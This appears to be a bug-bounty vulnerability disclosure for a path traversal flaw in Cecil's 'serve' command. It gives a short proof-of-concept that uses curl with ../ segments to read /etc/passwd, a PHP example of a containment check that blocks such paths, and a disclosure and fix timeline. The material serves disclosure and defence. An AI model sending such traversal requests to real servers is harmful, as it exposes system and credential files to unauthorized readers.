Relative Path Traversal vulnerability in the serve command in cecilapp/cecil

Valid

Reported on

Sep 7th 2023


Description

When a Cecil site is served by cecil serve, Relative Path Traversal is possible via the URI path.

Proof of Concept

Run the following commands:

mkdir cecil-path-traversal-poc
cd cecil-path-traversal-poc
curl -L https://cecil.app/cecil.phar -o cecil
chmod +x cecil
./cecil new:site -n
./cecil serve

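Then request a path containing ../ segments. The --path-as-is option stops curl from collapsing the ../ sequences before it sends the request:

curl --path-as-is http://localhost:8000/../../../../../../../../etc/passwd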

Impact

When a Cecil site is served by cecil serve, unauthenticated remote attackers can read any file on the host filesystem.
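The check a development server's router needs before it serves a file from the URI path, as an added example: this is not Cecil's code and not the content of the fix commit. The function name resolveServedFile, the temporary document root and the sample URIs are assumptions constructed for illustration.

```php
<?php
// Added example: hypothetical router helper, not Cecil's actual code.
declare(strict_types=1);

/**
 * Map a request URI to a file inside $docRoot. Returns null when the
 * resolved path does not exist or lies outside the document root.
 */
function resolveServedFile(string $docRoot, string $requestUri): ?string
{
    $root = realpath($docRoot);
    if ($root === false) {
        return null;
    }
    // Keep only the path component, then decode percent-escapes once.
    $path = parse_url($requestUri, PHP_URL_PATH);
    if (!is_string($path)) {
        return null;
    }
    $path = rawurldecode($path);
    if (strpos($path, "\0") !== false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks; false means no such file.
    $candidate = realpath($root . DIRECTORY_SEPARATOR . ltrim($path, '/\\'));
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Containment check. The trailing separator keeps a sibling directory
    // such as /srv/site-old from passing as a child of /srv/site.
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($candidate, $prefix, strlen($prefix)) === 0 ? $candidate : null;
}

// Constructed sample: a temporary document root holding a single page.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'site-' . bin2hex(random_bytes(4));
mkdir($root);
file_put_contents($root . DIRECTORY_SEPARATOR . 'index.html', '<h1>ok</h1>');

$uris = ['/index.html', '/../../../../../../../../etc/passwd',
         '/%2e%2e/%2e%2e/etc/passwd', '/missing.html'];
foreach ($uris as $uri) {
    $file = resolveServedFile($root, $uri);
    printf("%-45s => %s\n", $uri, $file === null ? '404' : 'serve ' . basename($file));
}

unlink($root . DIRECTORY_SEPARATOR . 'index.html');
rmdir($root);
```

Only /index.html is served; the plain and percent-encoded traversal paths resolve outside the root and are answered with 404, the same as a missing file.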

We are processing your report and will contact the cecilapp/cecil team within 24 hours. 3 months ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 3 months ago
We have contacted a member of the cecilapp/cecil team and are waiting to hear back 3 months ago
Arnaud Ligny validated this vulnerability 3 months ago
Yufan You has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Arnaud Ligny marked this as fixed in 7.47.1 with commit 00dc79 3 months ago
Arnaud Ligny has been awarded the fix bounty
This vulnerability has been assigned a CVE
Arnaud Ligny published this vulnerability 3 months ago